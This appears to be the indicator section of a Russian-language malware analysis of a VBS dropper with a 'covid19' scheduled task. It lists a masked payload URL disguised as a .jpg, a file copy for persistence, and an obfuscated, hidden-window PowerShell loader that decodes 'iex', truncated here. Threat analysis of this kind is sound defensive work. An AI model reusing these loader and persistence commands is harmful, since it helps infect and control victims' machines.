Техническая информация
- <SYSTEM32>\tasks\covid19
- %LOCALAPPDATA%\microsoft\<Имя файла>.vbs
- http://re#####ismbrasil.com/marco/cifrao17marchnj.jpg
- DNS ASK google.com
- DNS ASK re#####ismbrasil.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $y=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal df $y;$sf6asF54G132adghWEihnvmK=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $y=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal df $y;$sf6asF54G132adghWEihnvmK=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y